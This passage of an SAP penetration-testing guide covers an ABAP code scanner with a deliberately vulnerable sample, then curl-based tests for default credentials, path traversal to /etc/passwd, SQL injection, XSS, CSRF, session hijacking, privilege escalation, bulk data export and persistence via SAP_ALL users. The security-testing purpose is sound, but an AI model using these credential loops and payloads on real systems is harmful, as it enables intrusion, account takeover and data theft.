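     "native SQL: bypasses Open SQL client handling, classic SQL injection if concatenated"),
    ("os-command", re.compile(r"\bCALL\s+'SYSTEM'", re.I),
     "kernel call that runs an OS command as <sid>adm"),
    ("dynamic-code", re.compile(r"\b(GENERATE\s+SUBROUTINE\s+POOL|INSERT\s+REPORT)\b", re.I),
     "runtime code generation"),
    ("hardcoded-user", re.compile(r"\bsy-uname\s*(?:=|EQ)\s*'[^']*'", re.I),
     "logic keyed on a hard-coded user name (backdoor or leftover debug path)"),
    ("dynamic-file", re.compile(r"\bOPEN\s+DATASET\s+\w+", re.I),
     "file access with a variable path: check for traversal and AL11 exposure"),
]


def strip_comments(source):
    """Blank out full-line (*) and inline double-quote comments, keeping line numbers stable."""
    out = []
    for line in source.splitlines():
        if line.startswith("*"):
            out.append("")
            continue
        in_string, cut = False, len(line)
        for i, ch in enumerate(line):
            if ch == "'":
                in_string = not in_string
            elif ch == '"' and not in_string:
                cut = i
                break
        out.append(line[:cut])
    return "\n".join(out)


def split_statements(code):
    """Return (first_line, statement) pairs; a period followed by whitespace or EOF ends a statement
    (rough: a period inside a string literal will split too)."""
    stmts, start = [], 0
    for m in re.finditer(r"\.(?=\s|$)", code):
        chunk = code[start:m.start()]
        text = chunk.strip()
        if text:
            first = start + (len(chunk) - len(chunk.lstrip()))
            stmts.append((code.count("\n", 0, first) + 1, text))
        start = m.end()
    return stmts


def scan_abap(source):
    """Return findings as {'rule', 'line', 'msg'} dicts, ordered by line."""
    code = strip_comments(source)
    findings = []
    for lineno, line in enumerate(code.splitlines(), 1):
        for rule_id, pattern, msg in RULES:
            if pattern.search(line):
                findings.append({"rule": rule_id, "line": lineno, "msg": msg})
    stmts = split_statements(code)
    for i, (lineno, stmt) in enumerate(stmts):
        if re.match(r"AUTHORITY-CHECK\b", stmt, re.I):
            following = stmts[i + 1][1] if i + 1 < len(stmts) else ""
            if not re.search(r"\bsy-subrc\b", following, re.I):
                findings.append({"rule": "auth-check-ignored", "line": lineno,
                                 "msg": "AUTHORITY-CHECK result (sy-subrc) not evaluated by the next statement"})
    if re.search(r"\bSELECT\b", code, re.I) and not re.search(r"\bAUTHORITY-CHECK\b", code, re.I):
        findings.append({"rule": "no-auth-check", "line": None,
                         "msg": "reads database tables without any AUTHORITY-CHECK"})
    return sorted(findings, key=lambda f: (f["line"] is None, f["line"] or 0))


# Constructed sample with one of each issue
SAMPLE_ABAP = """\
REPORT zcust_export.
PARAMETERS: p_where TYPE string,
            p_file  TYPE string.
DATA lt_cust TYPE TABLE OF kna1.
* selection built straight from user input
SELECT * FROM kna1 INTO TABLE lt_cust WHERE (p_where).   " injectable
AUTHORITY-CHECK OBJECT 'S_TABU_DIS' ID 'DICBERCLS' FIELD 'KNA1' ID 'ACTVT' FIELD '03'.
OPEN DATASET p_file FOR OUTPUT IN TEXT MODE ENCODING DEFAULT.
IF sy-uname = 'DEVUSER'.
  CALL 'SYSTEM' ID 'COMMAND' FIELD 'id'.
ENDIF.
"""

if __name__ == "__main__":
    for f in scan_abap(SAMPLE_ABAP):
        print(f"line {f['line']}: [{f['rule']}] {f['msg']}")
```

Every hit still needs the SE80 look: a dynamic WHERE fed only from a SELECT-OPTIONS is fine, a sy-uname check inside a test report is fine, but each of these is where the real findings on custom code tend to sit.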
9. How to Test Business Logic
Workflow Testing
# SAP workflow (SBWP inbox, Fiori My Inbox, custom approval apps) exposes approve/reject through OData services under /sap/opu/odata/ on the ABAP stack.
# <service> and <entity> below are placeholders; take the real names from the app's network traffic or from /IWFND/MAINT_SERVICE.
# Approve a work item as a user who is not one of its agents: the backend must check agent assignment, not just hide the button in the UI
curl -sk -u lowpriv:pass -b cookies.txt -X POST \
  "https://target-sap.com:44300/sap/opu/odata/<service>/<entity>(WorkItemId='000000123456')/Approve?sap-client=100" \
  -H "X-CSRF-Token: <token fetched with X-CSRF-Token: Fetch>"
# Step skipping: call the completion action on a work item still in an earlier step, or re-submit one that is already completed
# Afterwards check SWIA / SWI1: the work item log shows who actually executed the step and whether the backend accepted it
Data Manipulation Testing
# Unauthorized read: query records of another user or company code through the same entity; SU53 on the test user shows which authorization was (or was not) checked
curl -sk -u lowpriv:pass "https://target-sap.com:44300/sap/opu/odata/<service>/<entity>?\$filter=CompanyCode%20eq%20'2000'&sap-client=100"
# Unauthorized write: PATCH/PUT on an entity the role should only read; success means the service implementation never checks ACTVT 02
curl -sk -u lowpriv:pass -b cookies.txt -X PATCH \
  "https://target-sap.com:44300/sap/opu/odata/<service>/<entity>('4711')?sap-client=100" \
  -H "X-CSRF-Token: <token>" -H "Content-Type: application/json" -d '{"Amount":"0.01"}'
10. How to Test for Default Credentials
Common Default Credentials
# Installation defaults that still turn up. The client matters: SAP* and DDIC exist in every client, EARLYWATCH only in 066, TMSADM in 000.
# SAP*:06071992      SAP*:PASS (kernel fallback when login/no_automatic_user_sapstar = 0 and SAP* was deleted)
# DDIC:19920707
# EARLYWATCH:SUPPORT (client 066)
# TMSADM:PASSWORD    TMSADM:$1Pawd2& (client 000)
# SAPCPIC:ADMIN
# AS Java: Administrator / J2EE_ADMIN have no fixed default; if the UME uses the ABAP user store the ABAP pairs apply there too
# Lockout caveat: login/fails_to_user_lock (default 5) locks the user for the day, so keep attempts per user and client below it and record what you tried
credentials=(
  "SAP*:06071992"
  "SAP*:PASS"
  "DDIC:19920707"
  "EARLYWATCH:SUPPORT"
  "TMSADM:PASSWORD"
  "SAPCPIC:ADMIN"
)
# ICF protects services with HTTP basic auth; the WebGUI service exists on every ABAP system, so a 200 there is a valid logon
for client in 000 001 066 100; do
  for cred in "${credentials[@]}"; do
    code=$(curl -sk -o /dev/null -w '%{http_code}' -u "$cred" \
      "https://target-sap.com:44300/sap/bc/gui/sap/its/webgui?sap-client=$client")
    case "$code" in
      200|302) echo "[+] client $client: valid credentials $cred (HTTP $code)" ;;
      401)     echo "[-] client $client: $cred rejected" ;;
      *)       echo "[?] client $client: $cred -> HTTP $code (user locked, client missing or service inactive?)" ;;
    esac
  done
done
11. How to Test for Information Disclosure
Error Message Testing
# Trigger ICF and AS Java error pages and read them
curl -sk "https://target-sap.com:44300/sap/does-not-exist" | grep -i 'sap\|error'
curl -sk "https://target-sap.com:50001/does-not-exist" | grep -i 'sap\|error'
# Look for:
# - Release and kernel (Server header and error page footer)
# - Host name, SID and client (the sap-usercontext cookie carries the client)
# - ABAP runtime dumps leaking into HTTP responses (the server side records them in ST22)
# - Java exception stack traces in response bodies of AS Java applications
System Information Testing
# ABAP: unauthenticated ICF services under /sap/public/ (active by default on many releases)
curl -sk "https://target-sap.com:44300/sap/public/info"                     # RFC_SYSTEM_INFO as XML: SID, host, release, kernel, DB
curl -sk "https://target-sap.com:44300/sap/public/ping"
curl -sk "https://target-sap.com:44300/sap/public/icf_info/logon_groups"    # logon groups and application server hosts
curl -sk "https://target-sap.com:44300/sap/public/icf_info/urlprefix"
# Message server HTTP interface (81NN) lists the application servers if ms/http_port is set
curl -s "http://target-sap.com:8100/msgserver/text/logon"
# Java: system information pages that should require authentication; verify that they do
curl -sk -o /dev/null -w "%{http_code}\n" "https://target-sap.com:50001/monitoring/SystemInfo"
curl -sk -o /dev/null -w "%{http_code}\n" "https://target-sap.com:50001/rep/build_info.jsp"
# SAP Start Service (5NN13): methods not listed in service/protectedwebmethods answer without credentials, e.g. the process list
curl -s -X POST "http://target-sap.com:50013/" -H "Content-Type: text/xml" -H 'SOAPAction: ""' \
  -d '<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"><SOAP-ENV:Body><GetProcessList xmlns="urn:SAPControl"/></SOAP-ENV:Body></SOAP-ENV:Envelope>'
12. How to Test for Path Traversal
Path Traversal Testing
# The ICM/ICF and the AS Java HTTP provider reject or normalise ../ in the URL path, so traversal against the URL root is noise; the sinks are parameters that name files
# ABAP: OPEN DATASET, GUI_DOWNLOAD/GUI_UPLOAD and archive functions with user-controlled names in custom code (AL11 shows what the server can see, e.g. /usr/sap/<SID>/ and /sapmnt/<SID>/profile)
# Java: servlets and Web Dynpro applications that take a file name or resource path as a parameter
# Test a real parameter, not the path (<app> and <param> are placeholders from your own enumeration)
curl -sk -u user:pass "https://target-sap.com:44300/sap/bc/<app>?<param>=../../../../etc/passwd&sap-client=100"
curl -sk -u user:pass "https://target-sap.com:44300/sap/bc/<app>?<param>=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd&sap-client=100"
curl -sk -u user:pass "https://target-sap.com:44300/sap/bc/<app>?<param>=%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd&sap-client=100"
# Windows hosts: ..\..\..\windows\win.ini
# High-value files on an SAP host: the instance and default profiles under /sapmnt/<SID>/profile, and the secure store and PSE files under /usr/sap/<SID>/SYS/global/security
13. How to Test for SQL Injection
ABAP SQL Injection Testing
# Open SQL runs one statement per call: no stacked queries, no comment sequences, and no UNION smuggled into a dynamic WHERE. What is injectable is the
# logic of a dynamic WHERE / ORDER BY / field list built by string concatenation in custom code (SELECT ... WHERE (lv_where)).
# Payloads that work against a dynamic Open SQL WHERE (<search-service> and q are placeholders for the custom ICF or OData handler you found):
curl -sk -u user:pass "https://target-sap.com:44300/sap/bc/<search-service>?q=X'%20OR%20mandt%20NE%20'&sap-client=100"      # condition becomes ... = 'X' OR mandt NE '': returns everything
curl -sk -u user:pass "https://target-sap.com:44300/sap/bc/<search-service>?q=X'%20AND%20mandt%20EQ%20'999&sap-client=100"  # returns nothing: a boolean oracle for extracting data
# Native SQL (EXEC SQL, ADBC cl_sql_statement) and AS Java JDBC code behave like classic SQL injection: UNION and stacked queries apply, and the DB user is the schema owner of the whole SAP database
# On the ABAP side the fix is cl_abap_dyn_prg=>quote( ) / escape_quotes( ) on every value entering a dynamic clause, or a static WHERE with host variables
14. How to Test for XSS
XSS Testing
# Reflected: ICF handlers and BSP pages that echo a parameter; check the raw response for the unencoded payload
curl -sk -u user:pass "https://target-sap.com:44300/sap/bc/<app>?q=%3Cscript%3Ealert(1)%3C/script%3E&sap-client=100" | grep -i '<script>alert'
# Stored: any free text shown to other users (long texts, notes, attachment names) written through an OData service
curl -sk -u user:pass -b cookies.txt -X POST "https://target-sap.com:44300/sap/opu/odata/<service>/<entity>?sap-client=100" \
  -H "X-CSRF-Token: <token>" -H "Content-Type: application/json" -d '{"Note":"<img src=x onerror=alert(1)>"}'
# DOM-based: curl cannot evaluate it. Load the Fiori/UI5 app in a browser with the payload in the hash route (#<app>&/<route>?x=...) and watch the DOM;
# UI5 controls encode by default, so the bugs sit in custom formatters and sap.ui.core.HTML controls fed with user data
# Also check the response headers: missing Content-Security-Policy and X-Content-Type-Options, and uploaded files served with the uploader's Content-Type
15. How to Test for CSRF
CSRF Testing
# CSRF only matters for cookie-based sessions (SAP_SESSIONID_<SID>_<client>, MYSAPSSO2, AS Java JSESSIONID/saplb_*); a browser never sends an Authorization: Bearer header cross-site, so a request that carries only that header proves nothing
# ABAP ICF/OData: the token is fetched with a GET carrying X-CSRF-Token: Fetch and must be sent back on every state-changing call
curl -sk -u user:pass -c cookies.txt -D - -o /dev/null -H "X-CSRF-Token: Fetch" \
  "https://target-sap.com:44300/sap/opu/odata/<service>/?sap-client=100" | grep -i '^x-csrf-token'
# 1. POST with the session cookie but no token: must be rejected with 403 "CSRF token validation failed"
curl -sk -b cookies.txt -X POST "https://target-sap.com:44300/sap/opu/odata/<service>/<entity>?sap-client=100" \
  -H "Content-Type: application/json" -d '{"Field":"value"}' -o /dev/null -w "%{http_code}\n"
# 2. POST with a wrong token: also 403
curl -sk -b cookies.txt -X POST "https://target-sap.com:44300/sap/opu/odata/<service>/<entity>?sap-client=100" \
  -H "X-CSRF-Token: invalid" -H "Content-Type: application/json" -d '{"Field":"value"}' -o /dev/null -w "%{http_code}\n"
# 3. Custom ICF handlers and BSP applications do not get this for free: repeat the two requests against each state-changing custom service
16. How to Test for Rate Limiting
Rate Limiting Testing
# ABAP has no per-request rate limit out of the box. What exists is login/fails_to_user_lock (account lock after N bad passwords, default 5) and ICM capacity limits (icm/max_conn, icm/max_threads); any real throttling sits in the Web Dispatcher or a WAF in front.
# Measure whether anything throttles plain requests
for i in $(seq 1 200); do
  curl -sk -o /dev/null -w "%{http_code}\n" "https://target-sap.com:44300/sap/public/ping"
done | sort | uniq -c
# Password guessing is the case that matters: confirm the lock actually triggers (SU01 > Logon Data shows it; report RSUSR200 lists locked users)
# Bypass attempt against a front-end limiter that trusts client-supplied headers
curl -sk -o /dev/null -w "%{http_code}\n" -H "X-Forwarded-For: 127.0.0.1" "https://target-sap.com:44300/sap/public/ping"
17. How to Test for Session Management
Session Testing
# ABAP sessions: SAP_SESSIONID_<SID>_<client> (ICF security session), MYSAPSSO2 (logon ticket, accepted by every system that trusts the issuing SID), sap-usercontext; AS Java: JSESSIONID plus saplb_* for load balancing
# Session fixation: note the cookies issued before login, log in, and check that SAP_SESSIONID_* / JSESSIONID changed
curl -sk -c pre.txt -o /dev/null "https://target-sap.com:44300/sap/bc/gui/sap/its/webgui?sap-client=100"
curl -sk -b pre.txt -c post.txt -u user:pass -o /dev/null "https://target-sap.com:44300/sap/bc/gui/sap/its/webgui?sap-client=100"
diff <(grep -i session pre.txt) <(grep -i session post.txt)
# Session hijacking: replay a captured MYSAPSSO2 or SAP_SESSIONID cookie from another host; check the cookies are Secure and HttpOnly and that login/ticket_only_by_https = 1
# Session timeout: http/security_session_timeout (ABAP, default 1800 s); wait past it and replay the cookie
# Logout: /sap/public/bc/icf/logoff must invalidate the server-side session, not merely drop the cookie
18. How to Test for Privilege Escalation
Privilege Escalation Testing
# SAP authorization is object-based (S_TCODE, S_TABU_DIS, S_RFC, S_USER_GRP, S_DEVELOP ...), so "escalation" usually means a missing AUTHORITY-CHECK in custom code or an over-wide role, not an API flag
# Horizontal: read another user's or another company code's objects through the same service the test user legitimately uses; SU53 right after the request shows which authorization was (or was not) checked
curl -sk -u lowpriv:pass "https://target-sap.com:44300/sap/opu/odata/<service>/<entity>('<someone-elses-key>')?sap-client=100"
# Vertical: attempt an administrative function with the low-privilege user; on the GUI side try SU01, SE16 on USR02, SE38, SM59 and PFCG to see which transactions S_TCODE lets through
curl -sk -u lowpriv:pass -b cookies.txt -X POST "https://target-sap.com:44300/sap/opu/odata/<admin-service>/<entity>?sap-client=100" \
  -H "X-CSRF-Token: <token>" -H "Content-Type: application/json" -d '{"Username":"testuser"}'
# Classic escalation paths to verify are closed: S_DEVELOP with ACTVT 02 on object type DEBUG (debugger with replace), S_TABU_DIS/S_TABU_NAM on USR02 and AGR_*, S_RFC with RFC_NAME *, SE16N edit mode (&SAP_EDIT), SM59 destinations with stored admin credentials
19. How to Test for Data Exfiltration
Data Exfiltration Testing
# Generic read channels on an ABAP system: RFC_READ_TABLE over RFC or SOAP, SE16/SE16N/SQVI in the GUI, OData $expand and $batch through Gateway, GUI_DOWNLOAD, and the SQL editor in DBACOCKPIT/ST04
# Unauthorized access through OData: list the entity sets of a service the user can reach and look for ones that do not filter on the user's own data
curl -sk -u user:pass "https://target-sap.com:44300/sap/opu/odata/<service>/?\$format=json&sap-client=100"      # entity sets
curl -sk -u user:pass "https://target-sap.com:44300/sap/opu/odata/<service>/<entity>?\$top=5&\$format=json&sap-client=100"
# User enumeration: USR02 via RFC_READ_TABLE, or the UME on AS Java (/useradmin, /webdynpro/dispatcher/sap.com/tc~sec~ume~wd~enduser/)
# Bulk export: OData with a large $top where the service has no server-side paging, or RFC_READ_TABLE with ROWCOUNT 0 (no limit)
# Note whether the read is visible afterwards: Security Audit Log (SM20), table logging (rec/client), Read Access Logging (SRALMANAGER)
20. How to Test for Persistence
Persistence Testing
# Persistence on SAP goes through the system's own mechanisms, not HTTP admin endpoints. For each, create the object with the admin access you have, confirm it survives, then check whether it was logged (SM20 / RSAU_READ_LOG, change documents in SUIM):
# - User creation: SU01 or BAPI_USER_CREATE1 over RFC; a new user with SAP_ALL or a copy of an admin role
# - RFC destination with stored credentials or "Trusted Relationship" in SM59 pointing back into the system, or out to an attacker-controlled registered server program
# - Registered server program via the gateway (a reginfo rule allowing TP=* from any host): an external RFC server that answers calls from the system
# - Background job (SM36) running a custom report on a schedule under a technical user; periodic jobs survive restarts
# - Custom ICF service / handler class (SICF), an application deployed on AS Java (telnet administration on 5NN08), or modified standard code in SE38 without a transport
# - Profile parameter changes (RZ10) such as auth/no_check_in_some_cases or login/no_automatic_user_sapstar